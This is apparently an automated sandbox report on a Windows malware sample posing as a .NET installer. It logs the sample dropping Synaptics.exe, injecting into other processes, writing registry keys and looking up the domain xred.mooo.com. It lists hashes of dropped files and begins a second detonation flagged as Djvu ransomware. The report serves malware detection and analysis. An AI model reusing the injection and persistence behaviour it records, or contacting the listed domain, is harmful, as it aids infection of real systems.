Set value (data) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\ProgramData\Synaptics\Synaptics.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlgLegacy\{7D49D726-3C21-4F05-99AA-FDC2C9474656} C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\3b29b07001e8d6eb1d0fc429\Setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4724 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe
PID 4724 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe
PID 4724 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe
PID 4724 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 4724 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 4724 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 3124 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe C:\b319ec1c324fd5da558d6fda\Setup.exe
PID 3124 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe C:\b319ec1c324fd5da558d6fda\Setup.exe
PID 3124 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe C:\b319ec1c324fd5da558d6fda\Setup.exe
PID 4364 wrote to memory of 912 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 4364 wrote to memory of 912 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 4364 wrote to memory of 912 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 912 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\3b29b07001e8d6eb1d0fc429\Setup.exe
PID 912 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\3b29b07001e8d6eb1d0fc429\Setup.exe
PID 912 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe C:\3b29b07001e8d6eb1d0fc429\Setup.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe

"C:\Users\Admin\AppData\Local\Temp\infected dot net installer.exe"

C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\b319ec1c324fd5da558d6fda\Setup.exe

C:\b319ec1c324fd5da558d6fda\\Setup.exe /x86 /x64 /web

C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate

C:\3b29b07001e8d6eb1d0fc429\Setup.exe

C:\3b29b07001e8d6eb1d0fc429\\Setup.exe InjUpdate /x86 /x64 /web

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 xred.mooo.com udp
US 8.8.8.8:53 freedns.afraid.org udp
US 69.42.215.252:80 freedns.afraid.org tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 252.215.42.69.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 21.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 docs.google.com udp
GB 142.250.187.206:443 docs.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.200.3:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.179.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

memory/4724-0-0x0000000002460000-0x0000000002461000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\._cache_infected dot net installer.exe

MD5 9e8253f0a993e53b4809dbd74b335227
SHA1 f6ba6f03c65c3996a258f58324a917463b2d6ff4
SHA256 e434828818f81e6e1f5955e84caec08662bd154a80b24a71a2eda530d8b2f66a
SHA512 404d67d59fcd767e65d86395b38d1a531465cee5bb3c5cf3d1205975ff76d27d477fe8cc3842b8134f17b61292d8e2ffba71134fe50a36afd60b189b027f5af0

C:\ProgramData\Synaptics\Synaptics.exe

MD5 6eb2b081d12ad12c2ce50da34438651d
SHA1 2092c0733ec3a3c514568b6009ee53b9d2ad8dc4
SHA256 1371b24900cbd474a6bc2804f0e79dbd7b0429368be6190f276db912d73eb104
SHA512 881d14d87a7f254292f962181eee79137f612d13994ff4da0eb3d86b0217bcbac39e04778c66d1e4c3df8a5b934cbb6130b43c0d4f3915d5e8471e9314d82c1b

memory/4724-128-0x0000000000400000-0x00000000005B8000-memory.dmp

memory/4364-129-0x0000000000630000-0x0000000000631000-memory.dmp

C:\b319ec1c324fd5da558d6fda\Setup.exe

MD5 8b3ecf4d59a85dae0960d3175865a06d
SHA1 fc81227ec438adc3f23e03a229a263d26bcf9092
SHA256 2b088aefcc76d0baa0bff0843bf458db27bacc47a8e698c9948e53ffc471828b
SHA512 a58a056a3a5814a13153b4c594ed72796b4598f8e715771fc31e60c60a2e26250768b8f36b18675b91e7ecc777ef27c7554f7a0e92c2dfaba74531e669c38263

C:\b319ec1c324fd5da558d6fda\SetupEngine.dll

MD5 43bc7b5dfd2e45751d6d2ca7274063e4
SHA1 a8955033d0e94d33114a1205fe7038c6ae2f54f1
SHA256 a11af883273ddbd24bfed4a240c43f41ce3d8c7962ec970da2d4c7e13b563d04
SHA512 3f3068e660fea932e91e4d141d8202466b72447107ff43f90dea9557fc188696617025531220bc113dc19fdd7adf313a47ac5f2a4ce94c65f9aeb2d7deda7f36

C:\b319ec1c324fd5da558d6fda\sqmapi.dll

MD5 d475bbd6fef8db2dde0da7ccfd2c9042
SHA1 80887bdb64335762a3b1d78f7365c4ee9cfaeab5
SHA256 8e9d77a216d8dd2be2b304e60edf85ce825309e67262fcff1891aede63909599
SHA512 f760e02d4d336ac384a0125291b9deac88c24f457271be686b6d817f01ea046d286c73deddbf0476dcc2ade3b3f5329563abd8f2f1e40aee817fee1e3766d008

C:\b319ec1c324fd5da558d6fda\DHTMLHeader.html

MD5 cd131d41791a543cc6f6ed1ea5bd257c
SHA1 f42a2708a0b42a13530d26515274d1fcdbfe8490
SHA256 e139af8858fe90127095ac1c4685bcd849437ef0df7c416033554703f5d864bb
SHA512 a6ee9af8f8c2c7acd58dd3c42b8d70c55202b382ffc5a93772af7bf7d7740c1162bb6d38a4307b1802294a18eb52032d410e128072af7d4f9d54f415be020c9a

C:\Users\Admin\AppData\Local\Temp\HFIE38B.tmp.html

MD5 5391b49a7168718beb1eb9ed38ba6c57
SHA1 da1181f4ee162cb24f782515595b6de33c20f589
SHA256 1ad512e90754039cf8eb6e20a2b22b3490dc408fd2d920e422f5547054c2cf12
SHA512 f926fd3ccd7dc6a3a21e608cf0d39c321b89aae5de91dba62f1d57da4a8d7d9922fe762da14410305fbe4a1ab9943ceb33ebda4a9dc7f6311f97d9d519116e6c

C:\b319ec1c324fd5da558d6fda\ParameterInfo.xml

MD5 4925613d29bc7350130c7076e4c92c1c
SHA1 2821351d3be08f982431ba789f034b9f028ca922
SHA256 9157a0afe34576dfea4ba64db5737867742b4e9346a1f2c149b98b6805d45e31
SHA512 3e69650e4101a14ef69f94fa54b02d8d305039165a0bffc519b3cf96f2dcbcf46845e4669d29ccc5ceb887b2f95fc4756265b19d5c17aa176d3d6dc53ed83f77

C:\b319ec1c324fd5da558d6fda\1028\LocalizedData.xml

MD5 ff41100cc12e45a327d670652f0d6b87
SHA1 cb53d671cb66d28b6eb7247a1a0c70a114d07e6b
SHA256 ef3de7ab3d80a4d2865b9e191d2311112b4870103d383ae21882f251bbde7f0a
SHA512 f8a2f8db5957a43aa82bd7d193b2ff2a151bba6a9d0ad2d39e120909a0f8939123b389ebb4244a417f9e4d8e46629c49ac193c320231cb614253612af45281a8

C:\b319ec1c324fd5da558d6fda\1030\LocalizedData.xml

MD5 53aa67d27c43a35c6f61552ee9865f55
SHA1 504035de2fe6432d54bc69f0d126516f363e1905
SHA256 5d08b297b867179d8d2ec861dbf7e1dfdb283573430a55644e134ee39083157a
SHA512 7a284076f6f204e5be41eab3c3abb1983fbbc21669130cc7e6961a7b858f30caf83fbcb2ef44cfe712341ab664347df29d58b650f004608b015e61e4f5d4f47b

C:\b319ec1c324fd5da558d6fda\1037\LocalizedData.xml

MD5 94f3480d829cee3470d2ba1046f2f613
SHA1 9a8ffc781afb5f087b39abe82c11e20d3e08b4f3
SHA256 eceb759e0f06e5d4f30bc8a982f099c6c268cff4a1459222da794d639c74f97f
SHA512 436d52da9c6c853616cf088c83b55032e491d6d76eeca0bf0cb40b7a84383a1fcffcb8ac0793cdea6af04d02acf5c1654d6b9461506ee704d95a9469581e8eaf

C:\b319ec1c324fd5da558d6fda\1036\LocalizedData.xml

MD5 75bf2db655ca2442ae41495e158149c9
SHA1 514a48371362dfa2033ba99ecab80727f7e4b0ee
SHA256 1938c4ffedfbb7fea0636238abb7f8a8db53db62537437ff1ec0e12dca2abfab
SHA512 1b697d0621f47bb66d45ae85183a02ec78dd2b6458ef2b0897d5bbbd2892e15eaf90384bc351800b5d00cb0c3682db234fac2a75214d8ade4748fc100b1c85b2

C:\b319ec1c324fd5da558d6fda\1035\LocalizedData.xml

MD5 de5ccb392face873eae6abc827d2d3a7
SHA1 50eab784e31d1462a6e760f39751e7e238ba46a2
SHA256 6638228cb95fc08eebc9026a2978d5c68852255571941a3828d9948251ca087d
SHA512 b615a69b49404d97ce0459412fbd53415dfbc1792ed95c1f1bd30f963790f3f219e028f559706e8b197ce0223a2c2d9f2e1cac7e3b50372ebef0d050100c6d10

C:\b319ec1c324fd5da558d6fda\1032\LocalizedData.xml

MD5 8ecac4ca4cc3405929b06872e3f78e99
SHA1 805250d3aa16183dc2801558172633f718a839c4
SHA256 b9e9740a1f29eeaf213e1e0e01f189b6be1d8d44a2ab6df746eebe9cb772f588
SHA512 6f681c35a38a822f4747d6d2bcacefc49a07c9ca28a6b8eed38b8d760327419b5b469698bed37366c2480a4f118d4d36c6ae0f3c645f185e39a90ff26e749062

C:\b319ec1c324fd5da558d6fda\1031\LocalizedData.xml

MD5 f8e3a846d4aca062413094f1d953075e
SHA1 09f2aa5b5ef693051862965c7c1063d31623f433
SHA256 5a929328125673d922e7f969769b003f5cb6942daa92818a384d50ac755174c2
SHA512 95fead89ac87c700615deef0b5c75aa818172cb387fb5e7178d0a96adb4a60abe86c3793f1174ad27b3a12fe29a371682a032d83d2c63f50a223e37a9d5fc7c6

C:\b319ec1c324fd5da558d6fda\1033\LocalizedData.xml

MD5 24fde6338ea1a937945c3feb0b7b2281
SHA1 6b8b437cd3692207e891e205c246f64e3d81fdd5
SHA256 63d37577f760339ed4e40dc699308b25217ce678ce0be50c5f9ce540bb08e0a7
SHA512 9a51c7057de4f2ec607bb9820999c676c01c9baf49524011bb5669225d80154119757e8eb92d1952832a6cb20ea0e7da192b4b9ddf813fa4c2780200b3d7ba67

C:\b319ec1c324fd5da558d6fda\1025\LocalizedData.xml

MD5 d84db0827e0f455f607ef501108557d0
SHA1 d275924654f617ddaf01b032cf0bf26374fc6cd5
SHA256 a8d9fd3c7ebb7fee5adb3cafe6190131cebfcbeff7f0046a428c243f78eac559
SHA512 1b08115a4ea03217ce7a4d365899bd311a60490b7271db209d1e5979a612d95c853be33d895570e0fb0414ab16eb8fd822fe4e3396019a9edd0d0c7ff9e57232

C:\b319ec1c324fd5da558d6fda\SplashScreen.bmp

MD5 0966fcd5a4ab0ddf71f46c01eff3cdd5
SHA1 8f4554f079edad23bcd1096e6501a61cf1f8ec34
SHA256 31c13ecfc0eb27f34036fb65cc0e735cd444eec75376eea2642f926ac162dcb3
SHA512 a9e70a2fb5a9899acf086474d71d0e180e2234c40e68bcadb9bf4fe145774680cb55584b39fe53cc75de445c6bf5741fc9b15b18385cbbe20fc595fe0ff86fce

C:\b319ec1c324fd5da558d6fda\UiInfo.xml

MD5 d8f565bd1492ef4a7c4bc26a641cd1ea
SHA1 d4c9c49b47be132944288855dc61dbf8539ec876
SHA256 6a0e20df2075c9a58b870233509321372e283ccccc6afaa886e12ba377546e64
SHA512 ecf57cc6f3f8c4b677246a451ad71835438d587fadc12d95ef1605eb9287b120068938576da95c10edc6d1d033b5968333a5f8b25ce97ecd347a42716cd2a102

C:\b319ec1c324fd5da558d6fda\1029\LocalizedData.xml

MD5 51130f3479df72fe12b05a7aba1891d3
SHA1 fbaf9c0269d532a3ce00d725cd40772bc0ad8f09
SHA256 8845d0f0fadfdf51b540d389bbb0a8a9655cf65055e55dcd54fa655576dd70a1
SHA512 b641e22b81babbde85a6f324851d35f47bd769fc0cff74911010ae620cf682f9c7bc4d946d2f80a46a9851f3cc912625991c8a3876f1d958ea4d49d8791d1815

C:\b319ec1c324fd5da558d6fda\1041\LocalizedData.xml

MD5 5ab13768b6c897eff96e35f91b834d25
SHA1 54f04c73a57a409e4c1fe317a825ee2ed4ddcd10
SHA256 87b5ce86b0134ea82215dcf04ffbf7f5c8a570f814f82b4c7ba6106195924c6b
SHA512 ee98f34723a1593ef12589ea9657f8d9a3c9dc8a3fb5eed6f8bb026c6656a3ca6fec8243745ed7fbf406019b6e2b42762c1ee74d26c0f70cc9da272291fe680f

C:\b319ec1c324fd5da558d6fda\1044\LocalizedData.xml

MD5 a459afdbe20f5d4c904d3e3700ee9191
SHA1 22570b1de34c11796390057537269145a2c63438
SHA256 0ac4bcf5cee39ad42070e34393303ffe3ef27e71c8d9522f3dc01e12f93dda03
SHA512 b01536c774121ba9fe25014bb802b45449ba46529af8ad59f3ff93e339e7443238b268716ac051d24ac9eba093e5d66fd5c5faa2ca17bf744ec31e50627159ce

C:\b319ec1c324fd5da558d6fda\1043\LocalizedData.xml

MD5 898d2a1a5fac4d1a028aa11e0ed9f9b4
SHA1 343795fbc1bbf1b0982dc9e70501721433fba892
SHA256 73130da9b103f1812ca69cfffdf5750e74b0228cd40e0325a7f14e799aaf21a3
SHA512 fac3fd81d803c1029df6a3cd93060c950b0ba399fe074d438c4867d55468e7de9aa77bbd7b51fe866f6849684408c853d70956e94de39d4f61019825028a25e4

C:\b319ec1c324fd5da558d6fda\1042\LocalizedData.xml

MD5 ad25367f86144f29946df3b3866e7dbe
SHA1 cc8470dbe0bfe9394742d639d9caeec961a27928
SHA256 90d0885f929059358fe76e61b560b3d188abbe7c041babefc82038f6faebb7eb
SHA512 66a343d1405e377bf2d303b0ec896814a46248c05dfe61a2c3167ed1c915964f7f57b335bd7fae324461e65e5ee6bc2384eff28f71c4325eb3c4f89611659afb

C:\b319ec1c324fd5da558d6fda\1038\LocalizedData.xml

MD5 818e35b3eb2e23785decef4e58d74433
SHA1 41b43d0b3f81a3a294aa941279a96f0764761547
SHA256 3d8b2c8079cf8117340a8fc363dceb9be102d6eb1a72881b0c43e1e4b934303e
SHA512 98ae09da1be0ebe609d0e11d868258ab322cdc631e3105296c8ce243d821b415f3c487cbb4cd366bb4bdb7f0f9447a25836e53320b424a9ff817cac728ff4ae2

C:\b319ec1c324fd5da558d6fda\1040\LocalizedData.xml

MD5 5e805353cb010fc22f51c1f15b8bcaa1
SHA1 9360f229aee4fed6897d4f9f239072aa22d6da9e
SHA256 02b83ebd2689e22668a5ee55a213091fdc090dfee42c0be9386f530d48af8950
SHA512 275d7c7c952a352417fe896c5be07f5a4c50ff51569cb04ab615cda6a880a8e83f651c87f226a1eb79d8286f777488bfaac2636a1a2057cf5db83037b3e1214f

C:\b319ec1c324fd5da558d6fda\1045\LocalizedData.xml

MD5 95c6472f2c8329ec1c10f7df3a31c154
SHA1 624d46235912dc169913ba77caa7889219e2c394
SHA256 197722527d1ad65a10a29ecec04f029abc549eb5d05bc07a68107ad6dd4bd35b
SHA512 28149ab0c041dc35f717435f3c2218700090fc38723219c1cd40ec7f777c68d99dd08b6a42014ead8fb1e309637b6c33aa5dec0518dc1b72273c7a6fd7ef06c0

C:\b319ec1c324fd5da558d6fda\1049\LocalizedData.xml

MD5 1c8ad8f7aacde7ac59bfd9730cfcae80
SHA1 815c79113429b37d34c7ddff46ceccfe58b4cddc
SHA256 4faa58922f623685f05386ce518c0243e3f310db5ac64c58e5b4e91a3e4477b7
SHA512 27d5871f862756945c66397d539c79bf6032ec0d6a06255ad6b57ad1df3c1e8c87dc55dcc3febfb4bd1ce4eb24f3268fab30b1df3fd1c035d66410337db73785

C:\b319ec1c324fd5da558d6fda\3082\LocalizedData.xml

MD5 e58efac53fe2a16be9b99d0aa33baa3d
SHA1 7f2fecb6c4ebe9374a04f374d43465d968b3e33f
SHA256 64baa04b7ebb5ee833f43493497e99a6f2584bdc763a7c24700693cb89b35a0c
SHA512 b9b2e07e845e6bb509d4471cbe3c848836938e507308293f7c083c54cef61911a06110a5616c216ec72c39ce887b2e7f5961688809a2dad787d131ef2780d22e

C:\b319ec1c324fd5da558d6fda\2070\LocalizedData.xml

MD5 6930ce4e8e28f54a0db5d919b6babd0e
SHA1 0278bf717168c061709e60ca754c8dc6e32b92d1
SHA256 4bbb7f8a9743a5a21711156dc978dc8683b3edcd9ca32e4c6a38dbe6f5001e04
SHA512 904dc390c6cad81e60159683fadc5e8556585b32f1f9482accfedf3ee6b14cd8240e2225e3ce8a0338da93162cef601c4e9798327a1bc390e62b4eb2fc59cd4c

C:\b319ec1c324fd5da558d6fda\2052\LocalizedData.xml

MD5 759eb338d738ca6c531b9d5b06591b3b
SHA1 c9ed5ada615ccacd887a0d07ee25dfe1d7fbc00c
SHA256 a4c3bc545fc028935ad6ec4bd8ce51a300fab8a0b128cca89a8c14923d437b16
SHA512 82e6b969dedfdda477f6fb7fcb50a0acad0b26b9b4cca9f1adab5323c6c144da6c0bff34e39e0ef7b39f37ab5808f0064eace99867f7cd258e91aeb5aa5baef2

C:\b319ec1c324fd5da558d6fda\1055\LocalizedData.xml

MD5 ddb64b6c4fc498c27d291edaaf65a536
SHA1 e312eef1e9a485c5c6fe4578bbe1dd0cadbb1e3e
SHA256 027180d93ceb875227a1d76a018b870cd1d09e143ffa1632b31c322b92dd6a35
SHA512 ddb55169000052fb27caeeb349939925c7df1535c5c697da7cc2be3224c2c8ebe64328d865d1dfdbad4c1e0588853c5309e31de747f71b7f3bc9b6a9eb4335c1

C:\b319ec1c324fd5da558d6fda\1053\LocalizedData.xml

MD5 984229d90d2e75f49cd9de5df014e484
SHA1 fc32854972f189305a38c11a62ef457cd94026c6
SHA256 c884f515f337e977d4cf1a19ff693c753813ede2e52a9dbe8f6ef25184ccae8d
SHA512 23101cc1b6c17f10a8d53c59c4e9bf6d24d03d781fa1a36fcb89315f2257ea4a1bd652bdbc81845479a88f00f1db52b35a0bba311a9885c7503689f9c25e49c2

C:\b319ec1c324fd5da558d6fda\1046\LocalizedData.xml

MD5 c13b50e2a7f6e7e9343500771cf2d247
SHA1 0b679d20dda94224a5ddd80863a2a32de1cc6f1e
SHA256 3f9bf4eee9ece4a0181ea344344230d73d711aba2fa9248834e3b7547a3062cf
SHA512 32daea597a34f60ca5b73648d66663e4723c0d588af4ce08f76240aabbecd3a35abfbfd5e22abd8eac8ca64a9f2b3edadb8d1c24bc31f53ce5cd902dba3fc5da

memory/4364-671-0x0000000000630000-0x0000000000631000-memory.dmp

memory/4364-670-0x0000000000400000-0x00000000005B8000-memory.dmp

memory/3944-743-0x00007FF800230000-0x00007FF800240000-memory.dmp

memory/3944-742-0x00007FF800230000-0x00007FF800240000-memory.dmp

memory/3944-744-0x00007FF800230000-0x00007FF800240000-memory.dmp

memory/3944-741-0x00007FF800230000-0x00007FF800240000-memory.dmp

memory/3944-740-0x00007FF800230000-0x00007FF800240000-memory.dmp

memory/3944-745-0x00007FF7FDD30000-0x00007FF7FDD40000-memory.dmp

memory/3944-746-0x00007FF7FDD30000-0x00007FF7FDD40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D8285E00

MD5 b437065823bd6276112855358fff6cfe
SHA1 cf15a34e5be2fa44e2e56582615d7cff9483ce52
SHA256 dae36560a9b52654fd2d1ed6f535798d598aed0dd7f903a3a7241b4441eb5ca6
SHA512 f97c8db16d11aa909adadb6ca516417a618c9c97b0654317005d96c8d47d6fe63ecf8b6128b3b66b842425ad42fa153af26aad257de801550b138f4ea088d4a2

memory/4364-791-0x0000000000400000-0x00000000005B8000-memory.dmp

memory/4364-795-0x0000000000400000-0x00000000005B8000-memory.dmp

memory/4364-818-0x0000000000400000-0x00000000005B8000-memory.dmp

memory/4364-825-0x0000000000400000-0x00000000005B8000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

141s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\starticon3.exe"

Signatures

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
